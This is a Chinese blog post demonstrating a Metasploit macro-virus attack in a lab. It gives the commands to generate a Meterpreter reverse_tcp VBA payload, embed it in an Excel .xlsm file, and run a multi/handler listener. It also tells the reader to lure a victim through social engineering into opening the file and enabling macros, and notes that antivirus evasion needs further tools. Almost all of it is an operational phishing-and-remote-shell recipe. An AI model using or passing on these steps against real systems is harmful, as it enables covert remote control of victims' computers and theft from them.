Metasploit之宏病毒攻击演示

摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:

受害机:win10(192.168.8.123)
攻击机:kali(192.168.8.131)

攻击演示:

1、生成能反弹会话的宏病毒代码

use windows/meterpreter/reverse_tcp
set lhost 192.168.8.131
set lport 8899
generate -t vba

2016-11-02_145622.png

2、将宏病毒植入office文件
将之前生成的宏病毒代码完整复制出来,新建一个excel文件,录制宏

2016-11-02_145835.png

编辑宏

2016-11-02_145937.png

打开左侧栏的"This Workbook",将之前复制的宏病毒代码完整的粘贴进去,保存好

2016-11-02_150022.png

保存过程中如果有如下提示,点击“否”,另存为“.xlsm”格式(启用宏的excel文件格式)

2016-11-02_150203.png

最后生成如下文件

2016-11-02_150325.png

3、设置metasploit监听返回会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.8.131
set lport 8899
exploit

2016-11-02_150626.png

利用社会工程学,把此文件诱导受害者点击打开,并启用宏
成功返回一个meterpreter会话

2016-11-02_150735.png

4、总结
原始生成的宏病毒代码并不具备免杀性质,需要辅以工具来达到免杀效果;
当受害者关闭带有病毒的文件后,相应的,返回的meterpreter会话也被终止。

2016-11-02_151044.png
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值